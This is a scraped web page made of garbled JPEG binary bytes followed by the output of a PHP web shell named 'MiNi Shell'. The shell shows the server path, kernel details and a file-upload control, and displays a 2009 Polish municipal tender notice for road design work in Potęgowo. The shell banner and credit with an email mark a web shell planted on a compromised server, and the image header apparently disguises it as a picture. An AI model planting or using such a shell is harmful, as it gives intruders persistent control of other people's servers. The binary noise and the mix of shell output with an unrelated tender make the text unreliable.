JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090130/31443-N-2009.html

<p class="kh_header"><b>Potęgowo: opracowanie dokumentacji projektowej zadania pn.: Przebudowa dróg gminnych w Potęgowie</b><br>
<b>Numer ogłoszenia: 31443 - 2009; data zamieszczenia: 30.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Potęgowo , ul. Kościuszki 5, 76-230 Potęgowo, woj. pomorskie, tel. 059 8115072, faks 059 8115072.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.potegowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie dokumentacji projektowej zadania pn.: Przebudowa dróg gminnych w Potęgowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej zadania pn.: Przebudowa dróg gminnych w Potęgowie: ul. Pocztowa, Głowackiego, Słoneczna, 9 Maja, Kwiatowa. Przedsięwzięcie zlokalizowane jest na terenie Gminy Potęgowo, powiat słupski, województwo pomorskie. Obecnie ulice te posiadają nawierzchnię gruntową lub asfaltową. Długości ulic są następujące:
- ul. Pocztowa - ok. 550 mb
- ul. Głowackiego - ok. 350 mb
- ul. Słoneczna - ok. 100 mb
- ul. 9 Maja - ok. 180 mb
- ul. Kwiatowa - ok. 250 mb 

Podane długości są orientacyjne.

Zakres robót budowlanych w ramach przebudowy będzie obejmował:
- wykonanie nawierzchni utwardzonej, np. asfalt, polbruk
- budowę chodników 1 lub 2-stronnych, w zależności od możliwości
- odwodnienie ulic i włączenie do istniejącej kanalizacji sanitarnej w obrębie projektowanych ulic
- możliwe wykonanie przebudowy oświetlenia, gdy zaistnieje taka potrzeba.

2.1. Do przedmiotu zamówienia Zamawiający posiada:
-  mapy ewidencyjne w skali 1:5000
- mapy zasadnicze w skali 1:1000 


2.2. Zakres prac związanych z projektowaniem obejmuje:
1) opracowanie pełnobranżowego projektu budowlano - wykonawczego - 4 egz. 
2) sporządzenie przedmiaru robót (każda z branż ma stanowić osobne opracowanie);
3) sporządzenie kosztorysu inwestorskiego (każda z branż ma stanowić osobne opracowanie);
4) sporządzenie informacji dotyczącej bezpieczeństwa i ochrony zdrowia;
5) sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych:
6) uzyskanie warunków, opinii i uzgodnień (w tym: z właścicielami działek, UG Potęgowo, gestorami uzbrojenia sieciowego);
7) uzyskanie wszelkich wymaganych decyzji i zezwoleń;
8) opracowanie raportu o oddziaływaniu przedsięwzięcia na środowisko (jeśli będzie wymagany);
9) uzyskanie map do celów projektowych;

Przedłożona kompletna dokumentacja ma pozwolić Zamawiającemu na złożenie wniosku o pozwolenie na budowę. 

- Dokumentację (pkt 1-5) należy dostarczyć także w wersji elektronicznej.
- Dokumentacja projektowa ma być sporządzona odrębnie dla każdego z etapów. Podział inwestycji na etapy realizacji robót budowlanych po uzgodnieniu z Zamawiającym, po wyborze oferty. 

3) Wymagania i informacje ogólne:
- Zapewnić opracowanie dokumentacji projektowej z należytą starannością w sposób określony w obowiązujących przepisach.
- Dokumentacje projektową oraz specyfikacje techniczne wykonania i odbioru robót budowlanych należy wykonać zgodnie z  przepisami Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego;
- Projekty wykonawcze, przedmiary robót oraz specyfikacje techniczne wykonania i odbioru robót budowlanych powinny uzupełnić i uszczegółowiać projekt budowlany w zakresie i stopniu dokładności niezbędnym do sporządzania kosztorysu inwestorskiego, przygotowania oferty przez Wykonawcę oraz realizacji  robót.
- Zastrzega się wymóg utajnienia i nieudostępniania kosztorysu poza Zamawiającym;
- Na etapie opracowania projektu przedstawiony zakres może ulec niewielkiej modyfikacji na życzenie Zamawiającego;
- Wykonawca w trakcie realizacji przedmiotu umowy zobowiązany jest przedstawiać do akceptacji Zamawiającego przyjęte rozwiązania;
- W przypadku wystąpienia okoliczności lub uzyskania informacji nieprzewidzianych w SIWZ do przetargu, a mogących mieć wpływ na ostateczny zakres robót i zachowanie technicznych i bezpiecznych warunków późniejszej realizacji i eksploatacji dróg, należy niezwłocznie poinformować o tym fakcie Zamawiającego celem ustalenia dalszego toku postępowania;
- Przyjęte rozwiązania projektowe powinny być określone za pomocą standardowych cech technicznych i jakościowych z zastosowaniem Polskich Norm przenoszących europejskie normy zharmonizowane (art. 29 i 30 ustawy Pzp). W projekcie nie można wskazywać znaków towarowych, patentów, pochodzenia. 
- Wymaga się od Wykonawcy sprawdzenia w terenie warunków wykonania zamówienia;
- Wykonawca jest zobowiązany do usunięcia własnym staraniem i na własny koszt wszelkich wad i błędów w opracowaniach projektowych ujawnianych na każdym etapie realizacji inwestycji.
4) Warunki odbioru dokumentacji projektowej:
- do dokumentacji należy dołączyć zbiór odpisów (kserokopii) uzyskanych opinii, uzgodnień, warunków technicznych i dokumentów technicznych;
- odbiór prac projektowych odbędzie się na podstawie protokołu zdawczo - odbiorczego. Odbiór ograniczy się do ilościowego, polegającego na sprawdzeniu wykazu elementów odbieranej dokumentacji z jej stanem faktycznym oraz do sprawdzenia, czy dołączono oświadczenie Wykonawcy podpisane przez upełnomocnionych przedstawicieli Wykonawcy i projektantów o jej kompletności oraz zgodności z umową, obowiązującymi przepisami oraz normami i ze jest kompletna z punktu widzenia celu, któremu ma służyć. Oświadczenie to stanowi integralną część dokumentacji projektowych;
5) W przypadku, gdy nie będzie dla przedsięwzięcia konieczne sporządzenie raportu o oddziaływaniu na środowisko, wynagrodzenie Wykonawcy zostanie pomniejszone o kwotę przeznaczoną na wykonanie raportu.
6)Zapłata wynagrodzenia nastąpi za faktycznie wykonane prace..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 3.000,00 zł (trzy tysiące złotych).
2) Wadium może być wniesione w następujących formach:
a) pieniądzu (na rachunek bankowy Zamawiającego B.S. Ustka 32 9315 0004 0010 8184 2000 0020),
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.).
3) Warunki zwrotu i zatrzymania wadium określone są w art. 46 ustawy Pzp.
4) Wadium należy wnieść do dnia terminu składania ofert.  Dowód wniesienia wadium należy dołączyć do oferty.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy zgodnie z art.22 ustawy PZP:
1) Spełniają warunki określone przepisami art.22 ust.1 ustawy PZP, tj.:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy PZP;
2) Prowadzą działalność gospodarczą w zakresie objętym przedmiotem zamówienia.
3) Dysponują odpowiednim potencjałem kadrowym, tj. osobami z uprawnieniami do projektowania w branży drogowej, wodno - kanalizacyjnej i elektrycznej.
4) Wykonali w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 2 usługi opracowania dokumentacji projektowej, odpowiadające swoim rodzajem, złożonością i zakresem przedmiotowi zamówienia i przedstawią referencje z należytego wykonania  tych usług, a jeżeli okres prowadzenia działalności jest krótszy - z okresu prowadzenia działalności.
 Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w oparciu o dokumenty wymagane w rozdziale V niniejszej Specyfikacji metodą spełnia nie spełnia. Wykonawcy, którzy nie spełnią choć jednego z ww. warunków, zostaną wykluczeni z postępowania, a ich oferty zostaną odrzucone..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający zgodnie z art.25 ustawy PZP wymaga, aby każdy Wykonawca złożył następujące dokumenty:
1) Odpowiednio wypełniony i podpisany formularz oferty  (załącznik nr 1).
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
3) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
4) Oświadczenie o spełnieniu przez Wykonawcę warunków określonych w art.22 ust.1 ustawy PZP i nie podleganiu wykluczeniu na podstawie art.24 ust.1 i 2 ustawy PZP (załącznik nr 2);
5) Potencjał kadrowy (załącznik nr 3) - wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia (osoby z uprawnieniami do projektowania w branży drogowej, wodno - kanalizacyjnej i elektrycznej) wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności. 
6) Pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w pkt 12.5 Wykonawca wskazał osoby, którymi będzie dysponował.
7) Dokumenty stwierdzające, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia oraz dowód przynależności do Izby Inżynierów Budownictwa;
8) Koncesje, zezwolenia lub licencje jeżeli ustawy nakładają obowiązek ich posiadania na podjęcie działalności gospodarczej w zakresie objętym zamówieniem.
9) Wykaz wykonanych w okresie ostatnich 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia co najmniej 2 usług opracowania dokumentacji projektowej, odpowiadających swoim rodzajem, złożonością i zakresem przedmiotowi zamówienia (załącznik nr 4) z załączeniem referencji potwierdzających, że usługi te zostały wykonane należycie, a jeżeli okres prowadzenia działalności jest krótszy - w okresie prowadzenia działalności;
10) Wskazanie przez Wykonawcę, w ofercie części zamówienia, której wykonanie będzie powierzone podwykonawcom, a także podanie nazw (firm) proponowanych podwykonawców (załącznik nr 5). Jeżeli Wykonawca nie wskaże podwykonawcy, będzie to oznaczało, iż wykona przedmiot zamówienia samodzielnie.
 11)Zaakceptowany wzór umowy (załącznik nr 6);
12) Dowód wniesienia wadium.
13) Umowę regulującą współpracę podmiotów występujących wspólnie, zawierającą co najmniej upoważnienie dla jednej ze stron umowy od pozostałych stron do reprezentowania ich w niniejszym postępowaniu lub reprezentowania i podpisania umowy w sprawie przedmiotowego zamówienia publicznego (jeżeli dotyczy).
14) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów na potwierdzenie uprawnienia do wykonywania określonej działalności Wykonawca postępuje zgodnie z § 2 rozporządzenia Prezesa Rady Ministrów z 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy, oraz form, w jakich te dokumenty mogą być składane (Dz.U. Nr 87, poz. 605 ze zm.)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.potegowo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzad Gminy Potęgowo, ul. Kościuszki 5, 76-230 Potęgowo.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2009 godzina 10:00, miejsce: sekretariat Urzędu Gminy Potęgowo, ul. Kościuszki 5, 76-230 Potęgowo.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com